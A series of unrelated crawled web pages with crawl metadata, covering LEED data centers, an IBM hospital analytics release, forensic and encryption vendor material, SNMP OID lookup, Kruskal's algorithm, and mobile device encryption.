Over the years, LEED has become more popular and is now an internationally accepted standard for "green buildings." While LEED certified homes, commercial buildings and even neighborhoods are present across the world, LEED data centers are surprisingly rare. Less than 5% of all US data centers have LEED certification. This, however, is changing, and more and more data centers are now becoming LEED certified, thanks to the growing awareness of environmental issues.
A single word to describe LEED certified data centers is "sustainable." Here are some characteristics of a typical LEED certified data center.
- Advanced cooling system to reduce energy consumption. This could be implemented in different ways, such as using outside air and cooling it by evaporation to cool the facility, deploying custom servers that operate at higher temperatures and using cold air containment pods with variable speed fans to match airflow with server requirements.
- Improved cooling efficiency. Using chilled water storage system, for instance, has the potential to transfer up to 10,400 kWh of electricity consumption from peak to off-peak hours daily and, therefore, improves cooling efficiency.
- Reduced energy consumption. Monitoring power usage in real-time and leveraging analytics during operations helps to allocate power judiciously. Distributing power at higher voltages reduces power loss, and eliminating energy-draining transformers helps to convert power to the appropriate voltage and reduce the generation of heat. The overall aim is to maintain low power usage effectiveness (PUE), which is the measure of the energy used beyond the IT load.
- Using a clean backup power system. One innovative approach is replacing the football field sized room full of batteries that powers the uninterrupted power supply with mechanical fly wheels and a diesel engine. This reduces emissions, noise pollution and fuel consumption.
- Using renewable energy. Extensive use of renewable energy, such as solar power, to reduce dependence on the grid and fossil fuels is a characteristic of all green data centers, moreso when aspiring for LEED certification.
- Green construction. Construction of the facility also influences LEED certification. Using recycled materials for construction, purchasing materials near the site to reduce consumption of fossil fuels and diverting construction waste to nearby landfills reflects positively on LEED ratings.
- Intelligent design. Adopting an in-row design confines the heat to a smaller area, reducing the space to cool and, therefore, reducing electricity consumption considerably. Similarly, a modular design helps to contain cooling only to the required area instead of cooling the entire facility.
While LEED does not force data centers to follow specific methods of cooling, reducing energy consumption and the like, the system has a combination of credit categories, and each credit category has specific perquisites that the data center has to satisfy. Each rating system is made up of a combination of credit categories, and the number of points the project earns determines the level of LEED certification.
To learn more about data center certifications, check out our Certifications and Qualifications page. | <urn:uuid:8a34556e-2b0a-4492-9234-378d42e096c8> | CC-MAIN-2017-04 | http://www.lifelinedatacenters.com/data-center/leed-certification-data-centers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00401-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927543 | 685 | 2.890625 | 3 |
Originally published June 4, 2010
IBM announced a collaboration with South China's largest hospital, Guang Dong Hospital of Traditional Chinese Medicine, to apply new analytics technology to help doctors uncover trends and new knowledge about disease treatment from thousands of anonymous electronic medical records (EMR). The tool will also enable clinicians to perform empirical studies on the efficacy of certain traditional Chinese treatments.
While more and more health data is available through EMRs and other systems, it can be difficult and time-consuming for clinicians to extract and compile relevant patient data in a way that allows them to quickly pinpoint critical issues and detect patterns in the data.
To help solve this problem, scientists at IBM Research have built a first-of-a-kind system called Healthcare Information Warehouse for Analytics and Sharing that clinicians at Guang Dong Hospital of Traditional Chinese Medicine will use to study the effects of Traditional Chinese Medicine in conjunction with Western medicine in treating Chronic Kidney Disease (CKD).
The tool stores and synthesizes anonymized patient data and provides doctors with detailed reports that correlates patients' conditions and demographics - such as age and gender as well as by the presence of other health conditions, like heart disease or diabetes. The ability to extract, sift through and combine relevant patient data and clinical events should help doctors customize treatment plans and provide them an understanding of how different populations are affected by and respond to medical treatments. The system may also assist researchers in conducting in-depth analysis of data for clinical and operational studies.
"As more and more medical data becomes available through electronic medical records and interoperable systems, there is a real opportunity for doctors and clinicians to use the information in new ways for improved patient care," said Lu Yu Bo, president, Guang Dong Hospital of Traditional Chinese Medicine.
Hypertension and diabetes are major public health challenges worldwide, particularly in the United States and China, and are two of the primary causes of CKD, a progressive loss of kidney function. For example, it is estimated that about 40 percent of people with diabetes will develop CKD. And, according to the U.S. Centers for Disease Control, CKD affects about 17 percent of all adults over the age of 20 in the United States. Researchers have chosen to focus on the condition not only because of the number of persons it affects, but also because few Western treatments for the disease exist.
The analytics solution follows the creation of another first-of-a-kind system created by IBM for Guang Dong Hospital. Known as the Clinical Health Records Analytics and Sharing, the health records technology tool was launched in 2009 to enable the sharing of electronic medical records across the hospital network and the integration of Eastern and Western medicine into one standardized system. Healthcare Information Warehouse for Analytics and Sharing can be used as an extension of the Clinical Health Records Analytics and Sharing tool or as a standalone system.
"Evidence-generation is a key step towards making raw health data more usable for clinicians at the point of care," said Bill Cody, senior manager, healthcare informatics, IBM Research - Almaden. "Our collaboration with Guang Dong Hospital will make it easier for physicians to extract and analyze key data about chronic disease treatment, paving the way for evidence-based and more cost-effective medicine."
The new tool also marks a significant technical achievement because of its ability to input and analyze large collections of complex XML-based documents, making the information they contain easily accessible using current IBM business intelligence technologies including Cognos, Infosphere and SPSS. In the future, the hospital also plans to study additional acute and chronic diseases. The system has also been designed with more flexibility and extensibility than other systems, allowing for uses outside of healthcare including finance, energy utilities and other industries that find benefit from analyzing large amounts of complex XML data.
IBM's track record of improving healthcare through scientific achievements and collaboration with healthcare companies dates back to the 1950s. In the last decade, IBM has collaborated with Scripps to understand how influenza viruses mutate, worked with European universities to develop better HIV antiretroviral therapy methods and launched the World Community Grid, which has done projects on cancer, AIDS, dengue fever among other healthcare innovations. | <urn:uuid:baa82b23-79c7-4d2a-a1a9-ceea09513512> | CC-MAIN-2017-04 | http://www.b-eye-network.com/channels/1544/view/13947 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00125-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942092 | 845 | 2.953125 | 3 |
Unless specialized software is used, the simple act of booting a computer system is almost certain to change data on disk drives connected to the computer. This results in the contamination of digital evidence and often causes vast amounts of data to be destroyed or altered before it can be copied.
Copying files or backing up a disk drive are ineffectual forensic methods for a variety of reasons. Deleted files are not copied, nor are files or partitions that are hidden. Often times, backup programs modify the attributes of files and folders by flagging them as having been backed up.
The forensic methodology employed by ASR Data is completely non-invasive to the original evidence and does not change any data on disk sub-systems before, during or after the data acquisition process. All information is copied, including deleted files, unallocated disk space, slack space and partition waste space.
Gaining access to a disk drive non-invasively may be accomplished in several ways, depending on various technical configurations. Often times, the fastest and easiest way to image an internal disk drive is to remove it from its native environment and connect it to a computer which has had its hardware and software optimized to support the forensic process. Alternatively, the drive may be left in the computer and the computer booted using a modified version of an operating system which has been “neutered” to prevent it from changing any data on disk drives connected to the computer.
Providing a quantifiable measurement of authenticity and integrity of data is essential for satisfying admissibility standards such as Federal Rules of Evidence – Article X – Rule 1003 and Federal Rules of Evidence – Article IX – Rule 901.
The data acquisition and authentication protocol employed by ASR Data has been developed to facilitate the discovery process and addresses issues raised in Federal Rules of Civil Procedure, Rules 26 and 34.
ASR Data integrates digital evidence and chain of custody information and extends the authentication paradigm to include the embedded chain of custody information.
ASR Data’s methodology is fault tolerant and can authenticate data on damaged media. The protocol also supports the exclusion of privileged information while retaining the ability to acquire, authenticate and analyze desktops, laptops, servers, mobile devices and many types of removable media and optical data storage mediums.
ASR Data has developed tools and techniques that allow us to recover data other utilities and data recovery companies miss. More than simply recovering deleted files, our advanced tools and techniques allow us to defeat passwords, discern subtle patterns of computer usage and much more.
Reconstructing an accurate history of computer activity and identifying the “signature” of user initiated actions requires an in depth understanding of computer operating systems, file systems and disk storage subsystems.
ASR Data employs a standardized scientific methodology that has been proven to be sound, effective and reliable. Optimized to anticipate a wide variety of legal foundation and theoretical challenges, our findings and opinions are virtually incontrovertible.
Information obtained from the technical analysis of a computer may be of little practical value unless the information can be effectively disseminated. The presentation of information is often times as important as the information itself. Findings and opinions are presented in clear, concise terms.
Call us at (512) 918-9227 or schedule a free consultation | <urn:uuid:959dbdd3-410e-4539-ae11-7b1415151df9> | CC-MAIN-2017-04 | http://www.asrdata.com/litigation-support/forensic-methodology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00033-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927579 | 672 | 3.140625 | 3 |
Kaspersky Lab announces that its experts have developed and patented an advanced technology to recover passwords and encryption keys on mobile devices. Patent No. 2481632, issued by Rospatent, describes a method that almost eliminates any possibility of data compromise.
Encryption is an extremely safe method of protecting confidential data protection, which is widely used by both corporations and personal users. However, there is a disadvantage in its application: people forget and lose the passwords to access encrypted data. On the one hand this highlights the perils of losing passwords – if a password cannot be restored, the encrypted data also remains inaccessible. On the other hand, a recoverable password increases the risk of valuable data being compromised. Keep in mind that the methods used by vendors to protect backup copies may contain vulnerabilities which could allow unauthorized access to secret data.
As a result, consumers usually have to choose the lesser of two evils. Either use extremely well-protected solutions that do not forgive any human error and do not allow password recovery, or place your trust in the reliability of your vendor’s IT infrastructure if it allows password recovery.
Kaspersky Lab sought to avoid this compromise by developing its own technology to recover passwords and encryption keys on mobile devices.
Three independent factors
In order to recover passwords and keys for encrypted data, the Kaspersky Lab patented technology uses three independent factors: user ID, a mobile device ID and a random number.
When the user first installs mobile security solution, the authentication system asks for an email address. The technology identifies the hash addresses (the sequence of symbols that is received by converting the alphanumeric email address using a special algorithm). In addition, it creates a unique ID for the device based on its hardware characteristics and finally generates a random number. After registration, the encrypted random number together with the hashed email address and the device ID is transmitted to Kaspersky Lab’s servers.
The random number is used by the product in order to provide a "defense of the defense". The technology uses a special data encryption key. The key itself also needs to be protected by encryption to ensure its safety. Usually the key is protected by a user password. Whenever a user enters the password, the key is decrypted first and only then comes the turn of the information encrypted with it. Therefore, if the password is lost or forgotten, the information is almost impossible to decrypt. The patented technology can store two copies of keys on the device: the primary copy is encrypted with the help of the user password and the backup copy is encrypted using the previously generated random number.
If the user of the device loses or forgets the password, the special password recovery service asks for the email address. The service identifies the hashed address and checks it against its own hash database previously collected from all users with this technology integrated in their mobile security solutions. If a match is found, the system sends the unique number specified by the user during registration to that email address, together with instructions for creating a new password. Technology uses this unique number to decrypt the backup key which in its turn allows the user to access the data stored on the device.
As a result, Kaspersky Lab specialists were able to develop a data recovery algorithm which is convenient and at the same time secure, since none of the parties involved in this process has access to all the data required to decrypt the secret information. Kaspersky Lab stores neither the password backups nor any copies of keys, nor even any personal customer data on its servers – it keeps only encrypted values of specific information that helps users to access their data. These values are completely useless to cybercriminals.
"No matter how well the key to the safe is protected, if a cybercriminal gains access to that key, he gains access to the safe. However, if you split the key into the components and hide them in different parts of the world, cybercriminals are likely to go and look for another safe that is easier to crack. Our technology works in a similar way: it ‘hides’ the elements necessary to access sensitive data in different places and under different conditions. When the users need it, these elements can ‘come together’ in a single place. This takes no special effort from the user, but a cybercriminal faces a real struggle to piece together all the different elements of the ‘key’,” said Victor Yablokov, Head of Web & Messaging Development at Kaspersky Lab, one of the creators of the technology.
Kaspersky Lab continues to successfully increase its intellectual property. As of the end of June 2013, the company’s portfolio included over 120 patents issued by patent authorities in the US, Russia, China and Europe. Another 200 patent applications are currently being examined by the patent offices of these countries. | <urn:uuid:d43b4ce7-9fbc-481c-96c0-38563ecc4f8e> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/press/2013/Kaspersky_Lab_patents_its_technology_for_easy_and_secure_recovery_of_encrypted_data | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00033-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928966 | 981 | 2.765625 | 3 |
SSD vs. HDD: Performance and Reliability - Page 2
Now, in practice those higher percentages are not earth shattering. Most modern storage has redundant technology that minimizes data damage from a failed disk and allows hot replacements. But when you are talking about drive reliability, clearly that number is worth talking about.
Again, small blame to the HDD vendors for putting their best foot forward. No one really expects them to publish reams of data on how often their products fail… especially since the SSD vendors do the same thing. And on the whole, HDDs tend to fail more gracefully in that there may be more warning than a suddenly failing SSD. This does not negate the huge performance advantages of SSD but does give one pause.
SSD’s Reliability Failures
Some SSD failures are common to any storage environment, but they do tend to have different causes than HDD failures. Common points of failure include:
· Bit errors: Random data bits stored to cells, although it sounds much more impressive to say that the electrons leaked.
· Flying or shorn writes: Correct writes written in the wrong location, or truncated writes due to power loss.
· Unserializability: A hard-to-pronounce term that means writes are recorded in the wrong order.
· Firmware: Ah, firmware. Firmware fails, corrupts, or upgrades improperly throughout the computing universe: SSD firmware is no exception.
· Electronic failures: In spite of no moving parts, physical components like chips and transistors fail, taking the SSD down right along with it.
· Power outages: DRAM SSDs have volatile memory and will lose data if they lack a battery power supply. NAND SSDs are also subject to damaged file integrity if they are reading/writing during power interruptions.
As SSDs mature, manufacturers are improving their reliability processes. Wear leveling is a controller-run process that tracks data movement and component wear across cells, and levels writes and erases across multiple cells to extend the life of the media. Wear leveling maps logical block addresses (LBA) to physical memory addresses. It then either rewrites data to a new block each time (dynamic), or reassigns low usage segments to active writes (static) in order to avoid consistent wear to the same segment of memory. Note that writes are not the only issue: so is deletion. HDDs can write and read from the same sector, and in case of modified data can simply overwrite the sector. SSDs don’t have it this easy: they cannot overwrite but must erase blocks and write to new ones.
Data integrity checks are also crucial to data health. Error correction code (ECC) checks data reads and corrects hardware-based errors to a point. Cyclic Redundancy Check (CRC) checks written data to be sure that it is returned intact to a read request. Address translation guards against location-based errors by verifying that a read is occurring from the correct logical address, while versioning retrieves the current version of data.
Garbage collection helps to reclaim sparsely used blocks. NAND SSD only writes to empty blocks, which will quickly fill up an SSD. The firmware can analyze the cells for partially filled blocks, merge data into new blocks, and erase the old ones to free them up for new writes.
Data redundancy is also a factor. External redundancy of course occurs outside of the SSD with backup, mirroring, replication, and so on. Internal redundancy measures include internal batteries in DRAM SSDs, and striped data parity in NAND flash memory.
So Which Wins, SDD or HDD?
SSDs are clearly faster in performance, and if an HDD vendor argues otherwise then consider the source. However, reliability is an ongoing issue outside of hostile environments. We find that SSD reliability is improving and is commensurate with, or moving slightly ahead of, HDDs. SSD warranties have stretched from 3 to 5 years with highly reliable Intel leading the way. Intel and other top NAND SSD manufacturers like Samsung (at present, the world’s largest NAND developer), Kingston and OCZ are concentrating on SSD reliability by improving controllers, firmware, and troubleshooting processes.
The final score between NAND/DRAM SSDs and HDDs? Costs are growing commensurate. Reliability is about the same. Performance is clearly faster, and should rule the final decision between SSD and HDD. Hard drives will have their place for a long time yet in secondary storage, but I believe that they already lost their edge in high IO computing. For that, look to SSDs.
Photo courtesy of Shutterstock. | <urn:uuid:177e2852-072e-48c9-8c87-cb69682e7c77> | CC-MAIN-2017-04 | http://www.enterprisestorageforum.com/storage-hardware/ssd-vs.-hdd-performance-and-reliability-2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00519-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934343 | 952 | 2.78125 | 3 |
Microsoft founder Bill Gates became a multibillionaire by making computers a common fixture in households and businesses around the globe.
Now the software entrepreneur's charitable organization hopes to turn the same trick with a device that most Westerners take for granted, but which is a rarity in two-thirds of the world.
The Bill & Melinda Gates Foundation has announced an initiative to promote the spread of safe and affordable sanitation in developing nations:
In a keynote address at the 2011 AfricaSan Conference in Kigali, Sylvia Mathews Burwell, president of the foundation’s Global Development Program, called on donors, governments, the private sector, and NGOs to address the urgent challenge, which affects nearly 40 percent of the world’s population. Flush toilets are unavailable to the vast majority in the developing world, and billions of people lack a safe, reliable toilet or latrine. More than a billion people defecate in the open."No innovation in the past 200 years has done more to save lives and improve health than the sanitation revolution triggered by invention of the toilet," Burwell said in her speech at AfricaSan. "What we need are new approaches. New ideas. In short, we need to reinvent the toilet."
This is no joke. Poor sanitation is a leading cause of disease and death in underdeveloped nations. Anyone who has traveled through poor nations can attest to the abysmal conditions facing their impoverished citizens every single day. There's literally no escape.
According to the Foundation, 1.5 million children die annually from diarrheal disease. Proper sanitation, in conjunction with safe drinking water (another big problem) and improved hygiene could prevent "most of these deaths," the Foundation said in a statement.
The Gates's aren't just proselytizing. They're putting money behind the effort:
* A $3 million grant supporting eight universities in Africa, Asia, Europe and North America to finance efforts to "reinvent the toilet as a stand-alone unit without piped-in water, a sewer connection, or outside electricity—all for less than 5 cents a day."
* $42 million in new sanitation grants designed to "spur innovations in the capture and storage of waste, as well as its processing into reusable energy, fertilizer, and fresh water."
Beyond the obvious humanitarian aspects of this endeavor, the Foundation notes that proper sanitation is a sound economic investment, citing a World Health Organization study showing that each dollar invested can return $9 by making people healthier and more productive. Better sanitation cuts health care costs and reduces illness, disease, disability and premature death.
Say what you will about Gates and his business practices as co-founder and long-time CEO of Microsoft -- and fellow co-founder Paul Allen recently had plenty to say, not much of it positive -- the guy is trying to use some of his wealth these days to accomplish some good. You've got to give him that much. | <urn:uuid:373e96aa-ffc9-4cac-9d53-37584cdffb14> | CC-MAIN-2017-04 | http://www.itworld.com/article/2739748/hardware/bill-gates--toilet-evangelist.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00337-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958786 | 597 | 2.984375 | 3 |
A Brief History of the Internet of Things
Over the last few years, the Internet of things has evolved from an intriguing concept into an increasingly sophisticated network of devices and machines. As more and more "things" get connected to the Internet—from Fitbit activity monitors and home lighting systems to industrial machines and aircraft—the stakes grow exponentially larger. Cisco Systems estimates that approximately 12.1 billion Internet-connected devices were in use in April 2014, and that figure is expected to zoom to above 50 billion by 2020. The networking firm also notes that about 100 things currently connect to the Internet every second, and the number is expected to reach 250 per second by 2020. Eventually, the IoT will encompass about 99 percent of all objects, which currently totals approximately 1.5 trillion things. "The IoT holds potential for disruptive change," says Gilad Meiri, CEO of tech startup Neura. "The evolution of the technology will likely be faster than the Internet." Following is a brief timeline of important IoT events. | <urn:uuid:8bf49dfd-41ae-475e-9eba-cc75962b23b6> | CC-MAIN-2017-04 | http://www.baselinemag.com/networking/slideshows/a-brief-history-of-the-internet-of-things.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00153-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960875 | 202 | 2.984375 | 3 |
Before we can get started finding a OID we need to have a basic understanding of a few things. These topics are SNMP, MIB, OID and a MIB browser. If you understand these topics you can skip this.
Let’s first talk about SNMP. SNMP stands for Simple Network Management Protocol. SNMP is a protocol that is used to transport SNMP requests in the form of a Get or Set, as well as other types we won’t cover here. A SNMP Get is a request for data, and a SNMP Set is a request to change something. If we wanted to look at the sysname of a switch we would need to send a SNMP Get for “.220.127.116.11.18.104.22.168.0” to the device. This seemingly random number is called an Object Identifier (OID) for the sysname of a SNMP device defined by RFC1213 (MIB-II). If you wanted to change the sysname you would send a SNMP Set to “.22.214.171.124.126.96.36.199.0” with the new value for the sysname.
Now that we know enough about SNMP let’s move on to what an OID and a MIB file is. We know that an OID is an Object Identifier that can be defined by RFC’s. Extreme Networks also has a vendor specific OID’s for each EXOS version that covers more data collection points than what RFC1213 (MIB-II) covers. Im sure you’re asking yourself “How am I supposed to know that “.188.8.131.52.184.108.40.206.0” is for getting or changing the sysname. Well it’s not hard when you have a MIB file and a MIB browser.
A MIB file is a text file that defines all the OID’s available in that file. If you look at this file it will be hard to understand, which is fine. That is why MIB browsers where made. MIB browsers where made to interpreted MIB files and make it easier to understand each OID. Each OID will have a name, a description as well as if SNMP Get’s or Set’s are accepted. Most MIB browsers also have a built in feature to send SNMP Get's and Set's. This is great when looking for the right OID. Using the find feature "Ctrl+F" is very helpful in finding the correct OID you need.
1. Download any third party MIB browser. iReasoning
is free for non commercial use. iReasoning MIB browser and Extreme Management MIB Tools will have most of the RFC standard MIB files included.
2. Download the EXOS MIB. The EXOS MIB files are version specific so make sure you download the MIB file for the switch version you plan to poll. You can find the EXOS version using the "show switch
" command in EXOS. You can also follow the "How to Obtain and Upgrade EXOS"
article to download the MIB file.
3. Once you have the MIB file you will need to import/load the MIB file into any third party MIB browser.
4. Once loaded you can look through the folder structure search with the key word until getting to the MIB. For example if OID for “extremeCpuAggregateUtilization” is should use "CPU" as search key
5. Once you have found the correct OID description in the MIB browser you should be able to see the OID value. If your looking for a specific port counter you can use the SNMP get bulk to see what OID it is. | <urn:uuid:46fc099f-83f2-4ad4-aeff-744288912e03> | CC-MAIN-2017-04 | https://gtacknowledge.extremenetworks.com/articles/How_To/How-to-find-OID-for-a-particular-MIB | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00455-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915736 | 813 | 3.265625 | 3 |
Encryption is a process of translating a message, called
the Plaintext, into an encoded message, called the Ciphertext.
This is usually accomplished using a secret Encryption Key
and a cryptographic Cipher.
Two basic types of Encryption are commonly used:
Some interesting politics surround strong Encryption:
- Strong (i.e., hard to break) Encryption algorithms are considered
to be a munitions by the United States government. Exporting such
algorithms therefore amounts to arms smuggling -- a very serious offence!
- Some countries (i.e., France) forbid their citizens from using strong
- Strong encryption algorithms are freely available everywhere in the
world, on the Internet.
- In the United States, it is possible to patent an algorithm, including
an Encryption Cipher. This can limit who can make such algorithms. | <urn:uuid:ff861609-c168-4c28-adb3-bed520f572f5> | CC-MAIN-2017-04 | http://hitachi-id.com/concepts/encryption.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00483-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.872299 | 175 | 3.890625 | 4 |
Jocelyn Bérard, M.Ps. MBA is the Vice President of International Leadership and Business Solutions (Vice-président Leadership et Solutions d’Affaires — Internationale) at Global Knowledge Canada
From the earliest cave dwellers to modern corporate executives, people have told stories to make a point. Using the magic of the narrative form, stories summarize complex information and transform it into communication that is both entertaining and memorable.
Stories are powerful because they speak to both reason and emotion. A good story is easy to remember, and the listener will want to tell it to others. Effective storytelling is a very powerful way to organize and think about information while engaging an audience in your message.
Structuring the Story
A powerful story makes the point quickly and effectively. If a story takes too long, the audience is lost. If it is too complex, the audience is confused. The power of a story in part depends on its simplicity. Powerful stories are visual stories. The listener can see the players, see the scene, and feel the tension that makes up the plot of your story.
The 4 P’s of a Powerful Story
To ensure that your story has impact and purpose, consider the following basic structure.
Purpose: Know why you are telling your story. This helps you:
- Focus on the essentials without bringing in unnecessary details.
- Ensure that you follow a logical flow so that the message does not have to be explained — everyone will get it the first time.
People: Talk about real characters. Describe the people so your audience can imagine them. Paint a picture in words. Use actual conversations.
Plot: Give your story a beginning, a middle, and an end. There needs to be tension for a story to work. Keep your story simple. It is not a novel.
Place: Place your story in a location that people can visualize. Give them enough visual cues so that they can put themselves in your story.
Consider the 4 P’s of a powerful story the next time you communicate with your team, your organization, or your clients and watch engagement in your message flourish. After all, storytelling is a great way to enhance your communication. | <urn:uuid:05a7781c-2487-4144-911e-2e73b509fd6e> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2012/06/21/the-4-ps-of-a-powerful-story/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00391-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920406 | 452 | 2.984375 | 3 |
0.4.5.2 Kruskal's Algorithm
Kruskal's algorithm for finding a minimal spanning tree in
a connected graph is a greedy algorithm; that is, given a
choice, it always processes the edge with the least weight.
This algorithm operates by considering edges in the graph in order of
weight from the least weighted edge up to the most while keeping track
of which nodes in the graph have been added to the spanning tree. If
an edge being considered joins either two nodes not in the spanning
tree, or joins a node in the spanning tree to one not in the spanning
tree, the edge and its endpoints are added to the spanning tree.
After considering one edge the algorithm continues to consider the
next higher weighted edge. In the event that a graph contains equally
weighted edges the order in which these edges are considered does not
matter. The algorithm stops when all nodes have been added to the
Note that, while the spanning tree produced will be
connected at the end of the algorithm, in intermediate steps
Kruskal can be working on many independent, non-connected
sections of the tree. These sections will be joined before
the algorithm completes.
Often this algorithm is implemented using parent pointers
and equivalence classes. At the start of the
processing, each vertex in the graph is an independent
equivalence class. Looping through the edges in order
of weight, the algorithm groups the vertices together
into one or more equivalence classes to denote that these
nodes have been added to the solution minimal spanning tree.
It is a good idea to process the edges by putting them into
a min-heap. This is usually much faster than sorting the
edges by weight since, in most cases, not all the edges will
be added to the minimal spanning tree. See the section on
the heapsort and the heap data structure
for more information about min-heaps. | <urn:uuid:3f735430-8f97-43d9-affe-33319f35e14d> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/alg/node95.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00025-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926253 | 409 | 3.5 | 4 |
Q. What was the first coin-operated arcade video game?
Arguably the golden age of arcade video games started somewhere in the mid 1970s and ended in the early 1980s. During that time, games like Space Invaders, Pac-Man, Galaga and Frogger were prevalent not only in video arcades but also in supermarkets, gas stations, restaurants and anywhere else business owners wanted to make some extra coinage. To find the first coin-operated arcade video game, we have to travel back a little farther.
In 1971, students at Stanford University set up the Galaxy Game, the earliest known coin-operated video game. Later that year, Computer Space was released and became the first mass-manufactured game. A year later, Pong went on to be the first game to reach mainstream popularity.
From a fistful of quarters to high limit action, check out how Evolution Gaming, the leading provider of live casino solutions, uses video conferencing to transform the way they do business. | <urn:uuid:ca71f5d8-9d9a-4289-81f3-49fd31965909> | CC-MAIN-2017-04 | http://www.lifesize.com/video-conferencing-blog/12-days-of-geek-day-6/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96103 | 205 | 2.53125 | 3 |
Today the TV Parental Guidelines Monitoring Board delivered key findings of a recent survey conducted on the TV Parental Guidelines to the Federal Communications Commission (FCC). More than 90 percent of parents say they are aware of the TV Parental Guidelines Ratings System, while over two-thirds say they use the ratings to manage their family TV viewing, according to this new study conducted on behalf of the Monitoring Board. The high visibility of the TV ratings and significant usage by parents demonstrate that the ratings system is providing a valuable resource to millions of U.S. families, representatives of the Monitoring Board said.
Public Opinion Strategies and Hart Research Associates conducted two Internet-based surveys. The first was a national survey of 1,001 parents of children 2 through 17 years old, conducted November 15 to 22, 2011. The second was a national survey of 500 teens, ages 13 to 17, conducted December 4 to 18, 2011. The samples for each survey are proportional to available census data for geographic region, gender, race and age. It assessed awareness, use and satisfaction with the guidelines.
Fifteen years ago, the television industry pledged to provide parents and caregivers with the essential information they need to help supervise television viewing in their homes. According to representatives of the Monitoring Board, this new research shows that parents have come to rely on the TV ratings system as a key tool in helping them monitor the shows their kids watch.
Among the top-line findings in the survey:
- 93 percent of parents and 82 percent of teens said they are aware of the TV ratings system
- 88 percent of parents and 81 percent of teens said they are aware that parental ratings for television programs appear on screen at the start of shows on broadcast and cable television
- 69 percent of parents view the TV ratings system favorably
- 68 percent of parents say they use the TV ratings system; the level of use peaks at 77 percent among parents of children who are 6 to 10 years old
- 69 percent of parents with a high school or less-than-high-school education, and 70 percent of parents with college experience less than the degree level, have used the TV ratings system
- 91 percent of African American parents, and 84 percent of Hispanic parents, said they find the TV ratings system helpful; and 77 percent of African American parents and 72 percent of Hispanic parents have used the TV ratings system to help make viewing decisions for their families
- 88 percent of parents were aware that the TV ratings system provides guidance based on the age of the child, and 82 percent of parents were aware that the TV ratings system provides information about the content of a program using letters (e.g., L for coarse language, V for violence, etc.)
- 67 percent of parents that subscribe to multichannel video services from a cable or satellite company are aware that their provider offers parental controls
- 36 percent of parents use either a V-Chip or cable/satellite-provided parental controls
The survey also indicated that many parents personally supervise television viewing in the home. Among the parents who report never having used parental controls, more than two-thirds of them said it was because “an adult is usually nearby when [their] children watch TV.”
Furhter information on key findings by the researchers is linked below. | <urn:uuid:1b8bd117-ae91-44d1-8052-fbfea25ef4db> | CC-MAIN-2017-04 | https://www.ncta.com/news-and-events/media-room/article/2415 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00051-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957571 | 667 | 2.734375 | 3 |
One of the more ubiquitous devices of the modern era is the smartphone. We can do nearly everything on it, and as such it has played a large part in the blurring of the lines between work and life. While this is good for many businesses, many of these devices are largely unsecured, which can lead to problems, especially if the unsecured data is actually sensitive company information. One way to secure devices is through the use of encryption.
Encryption is not a new concept, it’s probably been used since the inception of communication. In standard terms it’s the conversion of data into a form that can’t be easily understood by unauthorized people. This form is commonly referred to as a ciphertext, or more commonly a cipher. Some people will call this a code, as codes are the same idea. Only the form is not meant to be secure and can be understood by other people e.g., binary code, Morse code, etc.
When data is encrypted, it can be sent to recipients, usually using normal transmission methods e.g., Internet or data connections. Upon receipt of the encrypted data, it needs to be decrypted (changed back to normal data). Decryption on mobile, and most computerized devices, is done using a key. This key is an algorithm that can understand both the encryption and normal data. It takes the encrypted data and essentially translates it to a form of data we can read or interact with.
Many businesses go to great lengths to ensure their data is encrypted both within the network, when sent amongst the network, or to trusted recipients outside the network. In a perfect world, all of your connection points – devices that connect to the network – would be secure. In the real world, employees using mobile devices that are unencrypted to store data or access company systems pose a big risk.
Take for example the CEO checking his work email on his own iDevice. Any emails sent between the company’s email server and the phone’s email program will usually be encrypted. However, when an attachment is opened with confidential news about an upcoming merger, a copy is usually downloaded onto the phone’s memory. If the boss hasn’t taken steps to encrypt the mobile device’s memory, and the phone is lost then someone picking up the phone could turn it on and see this information. If the user can understand the information, they could create a ton of trouble for both companies involved.
